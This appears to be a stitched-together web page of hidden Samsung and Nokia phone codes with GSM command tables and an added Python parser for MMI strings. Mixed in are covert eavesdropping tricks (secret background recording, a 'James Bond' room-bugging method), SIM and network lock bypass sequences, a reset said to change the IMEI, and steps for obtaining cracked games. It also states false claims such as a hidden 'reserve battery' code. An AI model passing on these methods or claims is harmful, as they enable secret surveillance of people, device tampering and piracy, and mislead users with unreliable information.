    *2767*380667# = Ukraine MMS Settings
    *2767*7667# = Russia MMS Settings
    *2767*30667# = GREECE MMS Settings

    *#7465625# = Check the locks
    *7465625*638*Code# = Enables Network lock
    #7465625*638*Code# = Disables Network lock
    *7465625*782*Code# = Enables Subset lock
    #7465625*782*Code# = Disables Subset lock
    *7465625*77*Code# = Enables SP lock
    #7465625*77*Code# = Disables SP lock
    *7465625*27*Code# = Enables CP lock
    #7465625*27*Code# = Disables CP lock
    *7465625*746*Code# = Enables SIM lock
    #7465625*746*Code# = Disables SIM lock
    *7465625*228# = Activa lock ON
    #7465625*228# = Activa lock OFF
    *7465625*28638# = Auto Network lock ON
    #7465625*28638# = Auto Network lock OFF
    *7465625*28782# = Auto subset lock ON
    #7465625*28782# = Auto subset lock OFF
    *7465625*2877# = Auto SP lock ON
    #7465625*2877# = Auto SP lock OFF
    *7465625*2827# = Auto CP lock ON
    #7465625*2827# = Auto CP lock OFF
    *7465625*28746# = Auto SIM lock ON
    #7465625*28746# = Auto SIM lock OFF



    *#8999*427# WATCHDOG signal route setup
    *2767*3855# = Full Reset (Caution every stored data will be deleted.)
    *2767*2878# = Custom Reset
    *2767*927# = Wap Reset
    *2767*226372# = Camera Reset (deletes photos)
    *2767*688# Reset Mobile TV
    #7263867# = RAM Dump (On or Off)

    Type *#9998*627837793#, go to 'my parameters' and there you will find a new menu where you can unlock the phone. (not tested - for Samsung C100)
    To unlock a Samsung, turn the phone off, take the SIM card out and type the following code *#pw+15853649247w# .

    Java status code: #*53696# (Samsung X600)

    If you want to unlock your phone, put a SIM from another company in, then type *#9998*3323#; it will reset your phone. Push exit and then push 7; it will reset again. Put your other SIM in and it will say SIM lock; type in 00000000 and then it should be unlocked. Type in *0141# then the green call button and it's unlocked to all networks. This code may not work on the older phones and some of the newer phones. If it doesn't work you will have to reset your phone without a SIM in it by typing *#2767*2878# or *#9998*3855# (not tested)



    *2767*688# = Unlocking Code
    *#8999*8378# = All in one Code
    *#4777*8665# = GPSR Tool
    *#8999*523# = LCD Brightness
    *#8999*3825523# = External Display
    *#8999*377# = Errors
    #*5737425# = JAVA Something (I chose 2 and it crashed)
    *#2255# = Call List

    #*536961# = Java Status Code
    #*536962# = Java Status Code
    #*536963# = Java Status Code
    #*53696# = Java Status Code

    #*1200# = AFC DAC Val
    #*1300# = IMEI
    #*1400# = IMSI

    #*2562# = ??? White for 15 secs then restarts.
    #*2565# = Check Blocking
    #*3353# = Check Code
    #*3837# = ??? White for 15 secs then restarts.
    #*3849# = ??? White for 15 secs then restarts.
    #*3851# = ??? White for 15 secs then restarts.
    #*3876# = ??? White for 15 secs then restarts.

    #*7222# = Operation Typ (Class C GSM)
    #*7224# = I Got !! ERROR !!
    #*7252# = Operation Typ (Class B GPRS)
    #*7271# = Multi Slot (Class 1 GPRS)
    #*7274# = Multi Slot (Class 4 GPRS)
    #*7276# = Dunno
    #*7337# = EEPROM Reset (Unlock and Resets WAP Settings)
    #*2787# = CRTP ON/OFF
    #*3737# = L1 Dbg data
    #*5133# = L1 Dbg data
    #*7288# = GPRS Attached
    #*7287# = GPRS Detached
    #*7666# = SrCell Data
    #*7693# = Sleep Act/DeAct (Enable or Disable the Black screen after doing nothing for a while)
    #*7284# = Class : B,C or GPRS
    #*2256# = Calibration Info
    #*2286# = Battery Data
    #*2527# = GPRS Switching (set to: class 4, class 8, class 9 or class 10)
    #*2679# = Copycat feature (Activate or Deactivate)
    #*3940# = External loop test 9600 bps
    #*4263# = Handsfree mode (Activate or Deactivate)
    #*4700# = Half Rate (Activate or Deactivate)
    #*7352# = BVMC Reg value
    #*8462# = Sleeptime
    #*2558# = Time ON
    #*3370# = EFR (Activate or Deactivate)
    #*3941# = External looptest 115200 bps
    #*5176# = L1 Sleep
    #*7462# = SIM phase
    #*7983# = Voltage/Frequency (Activate or Deactivate)
    #*7986# = Voltage (Activate or Deactivate)
    #*8466# = Old time
    #*2255# = Call ???
    #*5187# = L1C2G trace (Activate or Deactivate)
    #*5376# = ??? White for 15 secs then restarts.
    #*6837# = Official Software Version
    #*7524# = KCGPRS
    #*7562# = LOCI GPRS
    #*7638# = RLC always open ended TBF (Activate or Deactivate)
    #*7632# = Sleep mode Debug
    #*7673# = Sleep mode RESET
    #*2337# = Permanent Registration Beep
    #*2474# = ???
    #*2834# = Audio Path
    #*3270# = DCS support (Activate or Deactivate)
    #*3282# = Data (Activate or Deactivate)
    #*3476# = EGSM (Activate or Deactivate)
    #*3676# = Flash volume formatted
    #*4760# = GSM (Activate or Deactivate)
    #*4864# = Dunno, doesn't work on newer versions
    #*5171# = L1P1
    #*5172# = L1P2
    #*5173# = L1P3
    #*7326# = Accessory (I got Vibrator)
    #*7683# = Sleep variable
    #*7762# = SMS Bearer CS (Activate or Deactivate)
    #*8465# = Time in L1
    #*9795# = wtls key
    #*2252# = Current CAL
    #*2836# = AVDDSS Management (Activate or Deactivate)
    #*3877# = Dump of SPY trace
    #*7728# = RSAV done# (Everything went to standard but nothing was deleted)
    #*2677# = ARM State (None or Full Rate)
    *#8999*636# = Have no clue what it is, i see 20 lines
    *#9999# = Software version
    *#8999*8376263# = HW ver, SW ver and Build Date
    *#8888# = HW version
    *#8377466# = Same HW/SW version thing

    *#7465625# = Check the locks
    *7465625*638*Code# = Enables Network lock
    #7465625*638*Code# = Disables Network lock
    *7465625*782*Code# = Enables Subset lock
    #7465625*782*Code# = Disables Subset lock
    *7465625*77*Code# = Enables SP lock
    #7465625*77*Code# = Disables SP lock
    *7465625*27*Code# = Enables CP lock
    #7465625*27*Code# = Disables CP lock
    *7465625*746*Code# = Enables SIM lock
    #7465625*746*Code# = Disables SIM lock
    *7465625*228# = Activa lock ON
    #7465625*228# = Activa lock OFF
    *7465625*28638# = Auto Network lock ON
    #7465625*28638# = Auto Network lock OFF
    *7465625*28782# = Auto subset lock ON
    #7465625*28782# = Auto subset lock OFF
    *7465625*2877# = Auto SP lock ON
    #7465625*2877# = Auto SP lock OFF
    *7465625*2827# = Auto CP lock ON
    #7465625*2827# = Auto CP lock OFF
    *7465625*28746# = Auto SIM lock ON
    #7465625*28746# = Auto SIM lock OFF

    *2767*3855# = E2P Full Reset
    *2767*2878# = E2P Custom Reset
    *2767*927# = E2P WAP Reset
    *2767*226372# = E2P Camera Reset
    #*6420# = MIC Off
    #*6421# = MIC On
    #*6422# = MIC Data
    #*6428# = MIC Measurement
    #*3230# = Trace enable and DCD disable
    #*3231# = Trace disable and DCD enable
    #*3232# = Current Mode
    #7263867# = RAM Dump (On or Off)
    *2767*49927# = Germany WAP Settings
    *2767*44927# = UK WAP Settings
    *2767*31927# = Netherlands WAP Settings
    *2767*420927# = Czech WAP Settings
    *2767*43927# = Austria WAP Settings
    *2767*39927# = Italy WAP Settings
    *2767*33927# = France WAP Settings
    *2767*351927# = Portugal WAP Settings
    *2767*34927# = Spain WAP Settings
    *2767*46927# = Sweden WAP Settings
    *2767*380927# = Ukraine WAP Settings
    *2767*7927# = Russia WAP Settings
    *2767*30927# = GREECE WAP Settings
    *2767*73738927# = WAP Settings Reset
    *2767*49667# = Germany MMS Settings
    *2767*44667# = UK MMS Settings
    *2767*31667# = Netherlands MMS Settings
    *2767*420667# = Czech MMS Settings
    *2767*43667# = Austria MMS Settings
    *2767*39667# = Italy MMS Settings
    *2767*33667# = France MMS Settings
    *2767*351667# = Portugal MMS Settings
    *2767*34667# = Spain MMS Settings
    *2767*46667# = Sweden MMS Settings
    *2767*380667# = Ukraine MMS Settings
    *2767*7667# = Russia MMS Settings
    *2767*30667# = GREECE MMS Settings
    *335# = Delete all MMS Messages
    *663867# = Dump Mm file
    #*536961# = WAPSAR enable / HTTP disable
    #*536962# = WAPSAR disable / HTTP enable
    #*536963# = Serial enable / Others disable
    #*53696# = Java Download Mode
    #*5663351# = WAP Model ID [Your Model]
    #*5663352# = WAP Model ID [SEC-SGHXXXX/1.0]
    #*566335# = WAP Model ID [SEC-SGHXXXX/1.0]
    *2767*66335# = Check on which model it is
    *2767*7100# = SEC-SGHS100/1.0
    *2767*8200# = SEC-SGHV200/1.0
    *2767*7300# = SEC-SGHS300/1.0
    *2767*7650# = Nokia7650/1.0
    *2767*2877368# = Reset WAP Model ID to standard

    Samsung D series hack



    hey hackers well samsung d820 is the phone i use personally..

    thought getting some hack codes..


    hmm SUCCESS


    try these out

    Tips and Tricks for the D820, D900, and other Samsung phones with similar firmware.

    #*22671* - Starts the phone recording in the background. It can record up to an hour, secretly. Press #*22672*

    Holding the volume button when the screen is off displays a short summary of information. Time, Date, signal, missed calls, etc...


    Enter code *#1234# to display Firmware version of the phone
    Example : D900XAFG6
    D900 = model
    XA = Region / Country
    F = Year (2006)
    G = Month (July)
    6 = Firmware Release in month (so this is the 6th revision)

    Hold down # to mute, or unmute the phone.

    Press 1 while watching a video to make it full screen.

    While playing a song in music player you can highlight a part of the song to be repeated over. While listening to the song press 7 at the point you want repeated, then press 7 again at the end of the section and it will loop the section between the two presses of 7.

    If you need to send a photo via MMS and it's too big to send and you have no PC available to downsize the pic (my limit is 100kb via MMS with my SIM), open the photo in photo editor on the phone and "save as", rename it differently from the original and you will have two copies of the pic, and the edited version will be under 100kb.

    Hidden Menu: *#8999*8378#

    Make MP3 sound louder:
    1. hit: *#8999*8378#
    2. hit: 2, and then 2 again.
    3. then on IIS NORMAL (or hit 9)
    4. then on "Rx vol."
    5. for level 10, click 0
    then save

    Originals are:
    level 10 = 10
    level 9 = 18

    Make sound setting louder when someone's calling:
    1. *#8999*8378#
    2. 2 times 2
    3. 1 (NORMAL)
    4. then on "Rx vol."
    5. level 5 type 140 instead of 120

    Any other tips or tricks? Feel free to post them.

    Exclusive Stuff : Samsung Mobile



    *#06# -> Show IMEI
    *#9999# -> Show Software Version
    *#0837# -> Show Software Version (instructions)
    *#0001# -> Show Serial Parameters
    *#9125# -> Activates the smiley when charging.
    *#9998*228# -> Battery status (capacity, voltage, temperature)
    *#9998*246# -> Program status
    *#9998*289# -> Change Alarm Buzzer Frequency
    *#9998*324# -> Debug screens
    *#9998*364# -> Watchdog
    *#9998*377# -> EEPROM Error Stack - Use side keys to select values. Cancel and ok.
    *#9998*427# -> Trace Watchdog
    *#9998*523# -> Change LCD contrast - Only with version G60RL01W
    *#9998*544# -> Jig detect
    *#9998*636# -> Memory status
    *#9998*746# -> SIM File Size
    *#9998*778# -> SIM Service Table
    *#9998*785# -> RTK (Run Time Kernel) errors - if ok then phone is reset, info is put in memory error.
    *#9998*786# -> Run, Last UP, Last DOWN
    *#9998*837# -> Software Version
    *#9998*842# -> Test Vibrator - Flash the screenlight during 10 seconds and vibration activated.
    *#9998*862# -> Vocoder Reg - Normal, Earphone or carkit can be selected
    *#9998*872# -> Diag
    *#9998*947# -> Reset On Fatal Error
    *#9998*999# -> Last/Chk
    *#9998*9266# -> Yann debug screen (=Debug Screens?)
    *#9998*9999# -> Software version
    *0001*s*f*t# -> Changes serial parameters (s=?, f=0,1, t=0,1) (incomplete)
    *0002*?# -> unknown
    *0003*?# -> unknown


    SP-unlock SGH-600 and SGH 2100

    *2767*3855# -> Full EEPROM Reset ( THIS CODE REMOVES the Security Lock and formats The Mobile's Chipset )

    But also changes IMEI to 447967-89-400044-0. To restore your old IMEI use the IMEI program found on the software page.

    *2767*2878# -> Custom EEPROM Reset ( does not change the security CODE )




    Mobile Cheat Stuff


    NOKIA



    1 Imagine your cell battery is very low, you are expecting an important call and you don't have a charger.

    Nokia instrument comes with a reserve battery. To activate, key is "*3370#"

    Your cell will restart with this reserve and your instrument will show a 50% increase in battery.

    This reserve will get charged when you charge your cell next time.

    *3370# Activate Enhanced Full Rate Codec (EFR)-Your phone uses the best sound quality but talk time is reduced by approx. 5%
    #3370# Deactivate Enhanced Full Rate Codec( EFR)


    *#4720# Activate Half Rate Codec - Your phone uses a lower quality sound
    but you should gain approx 30% more Talk Time
    *#4720# Deactivate Half Rate Codec

    2 *#0000# Displays your phone's software version,

    1st Line : Software Version,
    2nd Line : Software Release Date,
    3rd Line : Compression Type
    3 *#9999# Phone's software version if *#0000# does not work

    4 *#06# For checking the International Mobile Equipment Identity (IMEI Number)

    5 #pw+1234567890+1# Provider Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)

    6 #pw+1234567890+2# Network Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)

    7 #pw+1234567890+3# Country Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)

    8 #pw+1234567890+4# SIM Card Lock Status.(use the "*" button to obtain the "p,w" and "+" symbols)

    9 *#147# (vodafone) this lets you know who called you last *#1471# Last call (Only vodofone)

    10 *#21# Allows you to check the number that "All Calls" are diverted To

    11 *#2640# Displays security code in use


    12 *#30# Lets you see the private number

    13 *#43# Allows you to check the "Call Waiting" status of your phone.

    14 *#61# Allows you to check the number that "On No Reply" calls are diverted to

    15 *#62# Allows you to check the number that "Divert If Unreachable (no service)" calls are diverted to

    16 *#67# Allows you to check the number that "On Busy Calls" are diverted to

    17 *#67705646# Removes operator logo on 3310 & 3330

    18 *#73# Reset phone timers and game scores

    19 *#746025625# Displays the SIM Clock status, if your phone supports this power saving feature "SIM Clock Stop Allowed", it
    means you will get the best standby time possible

    20 *#7760# Manufacturer's code

    21 *#7780# Restore factory settings

    22 *#8110# Software version for the nokia 8110

    23 *#92702689# (to remember: *#WAR0ANTY#)

    Displays -
    1.Serial Number,
    2.Date Made
    3.Purchase Date,
    4.Date of last repair (0000 for no repairs),
    5.Transfer User Data.
    To exit this mode -you need to switch your phone off then on again

    24 *#94870345123456789# Deactivate the PWM-Mem

    25 **21*number# Turn on "All Calls" diverting to the phone number entered

    26 **61*number# Turn on "No Reply" diverting to the phone number entered

    27 **67*number# Turn on "On Busy" diverting to the phone number entered

    *** WARNING: Using secret codes may be harmful to your phone and result in disabling or worse. Use these codes at your own discretion; we accept no responsibility for blocked phones while using these codes!!!
    IMEI Number
    *#06# Cells Identity Code (IMEI = International Mobile Equipment Identity)
    XXXXXX XX XXXXXX X
    TAC FAC SNR SP
    TAC = Type Approval Code (first 2 digits = country code of the approval-country )
    FAC = Final Assembly Code: (01,02 = AEG)
    (10,20 Nokia)
    (40,41,44 Siemens)
    (30 Ericsson)
    (50 Bosch)
    (51 Sony,Siemens,Ericsson)
    (60 Alcatel)
    (65 AEG)
    (70 Sagem)
    (75 Dancall)
    (80 Philips)
    (85 Panasonic)
    SNR = Serial Nr.
    SP = Spare (always "0")

    Software Version
    *#0000# shows the software version
    Signal Processing
    *3370# - Enhanced Full Rate Codec (EFR) activation. It will automatically restart.
    #3370# - Enhanced Full Rate Codec (EFR) deactivation
    *4720# - Half Rate Codec activation. It will automatically restart.
    #4720# - Half Rate Codec deactivation
    Enhanced Full Rate will give you much better sound quality when you enable it. The new Enhanced Full Rate CODEC adopted by GSM uses the ACELP (Algebraic Code Excitation Linear Prediction) compression technology. This technology allows for much greater voice quality in the same number of bits as the older Full Rate CODEC. The older technology was called LPC-RPE (Linear Prediction Coding with Regular Pulse Excitation). Both operate at 13 kilobits (but you take up more space on the network, so they can charge you more). Talk-time is reduced by about 5%.



    Sim Clock Stopping
    *#746025625#
    [*#sim0clock#]
    Checks if the sim clock can be stopped. Sim clock stop is a kind of stand-by mode which will save battery time. This code doesn't work with software version 4.59.
    It will tell you if it can be stopped or not.


    Warranty Menu
    *#92702689# takes you to a secret menu with 6 choices:
    [*#war0anty#]
    1. Displays Serial Number.
    2. Displays the Month and Year of Manufacture (0997).
    3. Displays (if there) the date where the phone was purchased (MMYY).
    4. Displays the date of the last repair - if found (0000).
    5. Makes you capable of transferring user data if you have the gear for it.
    6. Shows how long the phone has been used to talk. This counter is not reset when you "clear timers" like the counters in the call register.


    Bypass the SP lock With a Nokia 16xx/21xx/31xx/51xx/81xx
    1. Insert SIM card of different provider.
    2. Turn on the phone and press the UP VOLUME key for 3 sec.
    Then release it and the phone says PIN CODE?
    3. Press the "C" key.
    4. Then Press * and wait until it disappears and appears again, then press * one more time and 04*PIN*PIN*PIN#


    Nokia Speed Trap Detector Urban Legend spread by Nokia Engineers ;^)
    The settings for radar speed traps detector. Your Nokia cell phone can be programmed to pick up radar speed traps, when programmed your cell phone picks up the radar and alerts you on the message alert tone. ( Doesn't work with Nokia 7110! )
    1. Enter your menu
    2. Select settings
    3. Select security settings
    4. Select closed user group
    5. Select on
    6. Enter 00000
    7. Press ok
    8. Clear back to normal; within a few seconds your phone will display a radar sign with five zeros next to it. It is now activated.
    Unfortunately only Nokia phones have this function. The Cell Phone info display needs to be de-activated: Settings -> Phone Settings -> Cell Info display. Each time you turn off your phone, or even each time you lose contact with your carrier, you'll have to activate it again... It is done using steps 1 through 5 above, but the number (00000) will already be in the field as a default.

    The James Bond Trick



    If you short-circuit the left, middle and right pins on the bottom of the phone with all connections touching each other, the Nokia software hangs! The profile "Headset" will be activated. Before you do this just activate the "Automatic Answer" in the headset profile and set the ringing volume to "Mute". Now you can use your phone for checking out what people are talking about in a room. Just place it under a table in a room and call it. The phone receives the call without ringing and you can listen to what people are saying!

    Network Monitor
    There is a hidden menu inside your Nokia phone. If you want to activate it, you'll have to re-program some chips inside of your phone.
    Check your software version. You can only continue if you have v4.33, v4.73 or v5.24.
    Take apart the phone.
    De-solder the EEPROM (ATMEL AT 24C64)
    Read out the data with an EEPROM programmer and save it to a file (Backup)
    If you have v4.33 or v4.73, change the address "03B8" from "00" to "FF"
    If you have v5.24 then change the address "0378" from "00" to "FF"
    Write the new data to the EEPROM and solder it back to the phone
    Power on your phone and you should have "Netmonitor" enabled.
    The Network Monitor gives you the following information:
    Carrier number, MS RX Level in DBM, Received signal quality, MS TX power level, C1 (Path loss criterion, used for cell selection and reselection). The range is -99 to 99, RTL (Radio link timeout), Timeslot, Indication of the transmitter status, Information on the Network parameters, TMSI (Temporary Mobile Subscriber Identity), Cell identification (Cell ID, Number of cells being used), MCC (Mobile country code), MCN (Mobile network code), LAC (Location area code), Ciphering (On/Off), Hopping (On/Off), DTX (On/Off), Discard cell barred information.


    Game Hacking with Blizzard



    Get the file called 'BlizzardN-GAGE.SIS' from IRC: join #mediaplace on Efnet (note: downloading cracked/hacked games is illegal unless you already own a copy of the game).
    The Blizzard Nokia N-Gage Installer.
    1. Unpack Blizzard.sis file that you get from mIRC
    2. Transfer the .sis file to your N-Gage
    3. Get the .blz (N-gage ROM) from mIRC
    4. copy the file to the root dir of your MMC (16MB MMC)Multimedia Card
    5. Use the Blizzard application to unpack the .blz file
    6. After unpacking, the Sonic icon should appear in the MENU
    7. Click the Sonic icon and it should work!



    List of compatible games for the 3650,6600 and the N-gage that work:
    [3650]
    SonicN (v.2.5+)
    Puyo Pop (v.2.5+)
    [6600]
    SonicN
    Puyo Pop
    Pandemonium
    Tomb Raider
    Super Monkey Ball
    Tony Hawks Pro Skater
    [N-Gage]
    SonicN
    Puyo Pop
    Pandemonium
    Tomb Raider
    Super Monkey Ball
    Tony Hawks Pro Skater

    GSM Network Services Command Strings
    When various network functions are selected via the cellphone's menu using the keypad, the cellphone automatically generates the corresponding GSM network command string and transmits it to the network. These commands can however be manually entered via the keypad.


    Each command is prefixed with either one or two * or # characters as follows:
    ** Register and Activate
    * Activate
    ## De-Register (and Deactivate)
    # Deactivate
    *# Check Status
    © Call button


    Once each command has been entered, if it is a network command (as opposed to a local handset command) it must be transmitted to the network by pressing the YES (receiver) key which acts as an enter key - this is represented here with the © character. Always enter numbers in full international format +CountryAreaNumber ( e.g. +447712345678).
    Command Description Command String
    Security
    Change call barring code **03*OldCode*NewCode*NewCode#©
    Change call barring code **03*330*OldCode*NewCode*NewCode#©
    Change PIN code **04*OldPIN*NewPIN*NewPIN#©
    Change PIN2 code **042*OldPIN2*NewPIN2*NewPIN2#©
    Unlock PIN code (when PIN is entered wrong 3 times) **05*PUK*NewPIN*NewPIN#©
    Unlock PIN2 code (when PIN2 is entered wrong 3 times) **052*PUK2*NewPIN2*NewPIN2#©
    Display IMEI *#06#
    Call Forwarding (Diversions)
    De-register all call diversions ##002#©
    Set all configured call diversions to number and activate **004*number#©
    De-register all configured call diversions (no answer, not reachable, busy) ##004#©
    Unconditionally divert all calls to number and activate **21*number#©
    Activate unconditionally divert all calls *21#©
    De-register unconditionally divert all calls ##21#©
    Deactivate unconditionally divert all calls #21#©
    Check status of unconditionally divert all calls *#21#©
    Divert on no answer to number and activate **61*number#©
    Activate divert on no answer *61#©
    De-register divert on no answer ##61#©
    Deactivate divert on no answer #61#©
    Check status of divert on no answer *#61#©
    Divert on not reachable to number and activate **62*number#©
    Activate divert on not reachable *62#©
    De-register divert on not reachable ##62#©
    Deactivate divert on not reachable #62#©
    Check status of divert on not reachable *#62#©
    Divert on busy to number and activate **67*number#©
    Activate divert on busy *67#©
    De-register divert on busy ##67#©
    Deactivate divert on busy #67#©
    Check status of divert on busy *#67#©
    Change number of seconds of ringing for the given service before diverting a call (such as on no answer). Seconds must be a value from 5 to 30. De-registering the same divert will also delete this change! **service*number**seconds#© (Service numbers, see below)
    Call barring
    Activate bar all outgoing calls (see Security to set code) **33*code#©
    Deactivate bar all outgoing calls #33*code#©
    Check status of bar all outgoing calls *#33#©
    Activate bar all calls **330*code#©
    Deactivate bar all calls #330*code#©
    Check status of bar all calls *#330*code#©
    Activate bar all outgoing international calls **331*code#©
    Deactivate bar all outgoing international calls #331*code#©
    Check status of bar all outgoing international calls *#331#©
    Activate bar all outgoing international calls except to home country **332*code#©
    Deactivate bar all outgoing international calls except to home country #332*code#©
    Check status of bar all outgoing international calls except to home country *#332#©
    Activate bar all outgoing calls **333*code#©
    Deactivate bar all outgoing calls #333*code#©
    Check status of bar all outgoing calls *#333#©
    Activate bar all incoming calls **35*code#©
    Deactivate bar all incoming calls #35*code#©
    Check status of bar all incoming calls *#35#©
    Activate bar all incoming calls when roaming **351*code#©
    Deactivate bar all incoming calls when roaming #351*code#©
    Check status of bar all incoming calls when roaming *#351#©
    Activate bar all incoming calls **353*code#©
    Deactivate bar all incoming calls #353*code#©
    Check status of bar all incoming calls *#353#©
    Call waiting
    Activate call waiting *43*#©
    Deactivate call waiting #43##©
    Check status of call waiting *#43#©
    Calling Line Identification
    The following only works if CLIP and CLIR are enabled (ask your service provider)
    CLIP: Presentation of the number of the incoming call
    Activate CLIP **30#©
    Deactivate CLIP ##30#©
    Check status of CLIP *#30#©
    CLIR: Presentation of one's own number to the called party
    Activate CLIR **31#©
    Activate CLIR for the actual call *31#number©
    Deactivate CLIR ##31#©
    Deactivate CLIR for the actual call #31#number©
    Check status of CLIR *#31#©
    COLP: Presentation of the actual number reached (if the number called was diverted to another number)
    Activate COLP *76#©
    Deactivate COLP #76#©
    Check status of COLP *#76#©
    COLR: Presentation of the original number called by the calling party (if the call was diverted to this cellphone)
    Activate COLR *77#©
    Deactivate COLR #77#©
    Check status of COLR *#77#©

    Cellphone Services
    10 All types of cellphone services
    11 Speech service
    12 Data service
    13 Fax
    14 Datex-J
    15 Teletex
    16 Short message service (SMS)
    18 All data services without SMS
    19 All cellphone services without SMS

    Carrier Services
    20 All services
    21 All asynchronous services
    22 All synchronous services
    23 3.1kHz services
    24 Synchronous point-to-point connections including PADs (all synchronous data services)
    25 Asynchronous point-to-point connections including PADs (all asynchronous data services)
    26 Data packet sending including PADs (all synchronous data packet services)
    27 Services with PAD share
    29 Digital connection with 12kbps

    GSM Network Service Codes
    Note that at present only the following service codes are in use:
    11 Speech
    13 fax
    25 data

    Cell Broadcast
    While Short Message Service (SMS) can be configured as a personal service, Cell Broadcast is a general service which is designed for subscribers of a specific cell or topic. For example, a subscriber to cell 050 in England will receive information on the GSM tower currently being used by their phone. This new concept brings a whole new meaning to the term mobile communications as the phone is now able to receive information such as share prices or weather updates without the need of data cards and computers. At present the following message types exist (note: this may vary from carrier to carrier and some carriers may charge for this service):

    Code Title
    000 Index
    010 Flashes
    020 Hospitals
    022 Doctors
    024 Pharmacy
    030 Long Distant Road Reports
    032 Local Road Reports
    034 Taxis
    040 Weather
    050 District
    052 Network Information
    054 Operator Services
    056 Directory Inquiries (national)
    057 Directory Inquiries (international)
    058 Customer Care (national)
    059 Customer Care (international)

    In the future one will be able to control each individual call by use of the following service codes. To do this the user has to insert the service code in front of the last # in the MMI command above.
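    The MMI string syntax described in this section (a procedure prefix, a 2-3 digit service code, supplementary-information fields separated by *, and a terminating #, with a basic service code placed in front of the last #) is something a reviewer of handset dial logs or a USSD/SS gateway needs to decode reliably. The parser below is an added example written for this page; it is not code from the original post, nor from any handset vendor or operator. It takes its prefix, service-code and basic-service tables from the lists on this page, and assumes the field order for call diversion (forward-to number, basic service code, no-reply timer) from 3GPP TS 22.030, which the page itself does not cite. The sample strings in the demo are constructed from the page's own table.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Procedure prefixes exactly as the page's table lists them.
PREFIXES = {
    "**": "register",     # register a number and activate
    "##": "erase",        # de-register (and deactivate)
    "*#": "interrogate",  # check status
    "*": "activate",
    "#": "deactivate",
}

# Supplementary service codes taken from the command table on this page.
SERVICE_CODES = {
    "03": "change call barring password", "04": "change PIN", "042": "change PIN2",
    "05": "unblock PIN with PUK", "052": "unblock PIN2 with PUK2",
    "06": "display IMEI",
    "002": "all call diversions", "004": "all conditional call diversions",
    "21": "divert unconditionally", "61": "divert on no answer",
    "62": "divert on not reachable", "67": "divert on busy",
    "33": "bar all outgoing calls", "330": "bar all calls",
    "331": "bar outgoing international calls",
    "332": "bar outgoing international calls except home country",
    "333": "bar all outgoing calls", "35": "bar all incoming calls",
    "351": "bar incoming calls when roaming", "353": "bar all incoming calls",
    "43": "call waiting", "30": "CLIP", "31": "CLIR", "76": "COLP", "77": "COLR",
}

# Basic service codes from the "Cellphone Services" / "Carrier Services" lists.
BASIC_SERVICES = {
    "10": "all teleservices", "11": "speech", "12": "data", "13": "fax",
    "16": "SMS", "19": "all teleservices except SMS",
    "20": "all bearer services", "21": "all asynchronous services",
    "22": "all synchronous services", "25": "asynchronous data",
}

DIVERSION_CODES = {"002", "004", "21", "61", "62", "67"}
LOCAL_CODES = {"06"}  # answered by the handset itself; nothing is sent to the network

_PREFIX_RE = re.compile(r"^(\*\*|##|\*#|\*|#)")
_NUMBER_RE = re.compile(r"^\+\d{7,15}$")  # full international format, as the page requires


@dataclass
class MmiCommand:
    action: str
    service_code: str
    service: str
    fields: List[str]             # supplementary information fields (SIA, SIB, SIC, ...)
    network: bool                 # True if the string goes to the network on the call key
    warnings: List[str] = field(default_factory=list)

    @property
    def number(self) -> Optional[str]:
        return self.fields[0] if self.fields and self.fields[0] else None


def parse_mmi(text: str) -> MmiCommand:
    """Parse one supplementary-service MMI string such as '**61*+447712345678**20#'."""
    s = text.strip()
    m = _PREFIX_RE.match(s)
    if not m or not s.endswith("#") or len(s) < 4:
        raise ValueError(f"not a supplementary-service MMI string: {text!r}")
    prefix = m.group(1)
    body = s[len(prefix):-1]          # drop the prefix and the terminating '#'
    sc, *fields = body.split("*")
    if not re.fullmatch(r"\d{2,3}", sc):
        raise ValueError(f"service code must be 2-3 digits, got {sc!r}")
    if sc not in SERVICE_CODES:
        raise ValueError(f"unknown service code {sc!r}")
    if len(fields) > 4:
        raise ValueError("too many supplementary information fields")
    cmd = MmiCommand(PREFIXES[prefix], sc, SERVICE_CODES[sc], fields, sc not in LOCAL_CODES)
    if sc in DIVERSION_CODES:
        _check_diversion(cmd)
    return cmd


def _check_diversion(cmd: MmiCommand) -> None:
    """Field order for diversions is assumed from 3GPP TS 22.030 (not stated on the page):
    SIA = forward-to number, SIB = basic service code, SIC = no-reply timer in seconds."""
    sia, sib, sic = (cmd.fields + ["", "", ""])[:3]
    if cmd.action == "register" and not sia:
        cmd.warnings.append("registration without a forward-to number")
    if sia and not _NUMBER_RE.match(sia):
        cmd.warnings.append(f"number {sia!r} is not in international +CountryAreaNumber format")
    if sib and sib not in BASIC_SERVICES:
        cmd.warnings.append(f"unknown basic service code {sib!r}")
    if sic and not (sic.isdigit() and 5 <= int(sic) <= 30):
        cmd.warnings.append(f"no-reply timer {sic!r} must be 5..30 seconds")


def describe(text: str) -> str:
    """One-line summary, e.g. for reviewing which diversions a handset's dial log set up."""
    cmd = parse_mmi(text)
    where = "network" if cmd.network else "handset"
    extra = f" -> {cmd.number}" if cmd.number else ""
    note = f" [warnings: {'; '.join(cmd.warnings)}]" if cmd.warnings else ""
    return f"{cmd.action} {cmd.service} ({cmd.service_code}){extra} via {where}{note}"


if __name__ == "__main__":
    # Constructed samples, built from the command strings listed on this page.
    for sample in ("**61*+447712345678**20#", "*#21#", "##002#", "*#06#", "**21*07712345678#"):
        print(f"{sample:28s} {describe(sample)}")
```

    The parser rejects strings that are not supplementary-service commands (the Nokia `#pw+...+1#` lock-status strings, for instance), flags a forward-to number that is not in the international format the page insists on, and flags a no-reply timer outside the 5 to 30 second range given in the table. Run over a list of dialled strings it shows at a glance which diversions and barrings were registered, erased or merely interrogated.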




    Secret Codes for some Nokia models
    Nokia 9000/9000i

    To view IMEI number *#06#
    To view Software Version enter *#8110# Latest Version is under Phone Info.
    To view Week and Year of manufacture enter *#3283#

    Nokia 9110

    *#06# for checking the IMEI (International Mobile Equipment Identity)
    *#0000# shows the SW version.

    Latest software version: v5.02 (26-08-99)RAE-2

    Nokia 7110

    *#06# for checking the IMEI (International Mobile Equipment Identity)
    *#0000# To view Software Version.
    *#3370# - Enhanced Full Rate Codec (EFR) activation. It will automatically restart.
    *#3370* - Enhanced Full Rate Codec (EFR) deactivation. It will automatically restart.
    *#4720# - Half Rate Codec activation. It will automatically restart
    *#4720* - Half Rate Codec deactivation. It will automatically restart
    *#746025625# - Sim clock allowed status.
    *#92702689# [*#war0anty#] - takes you to a secret menu with 6 choices:

    1. Displays Serial Number.
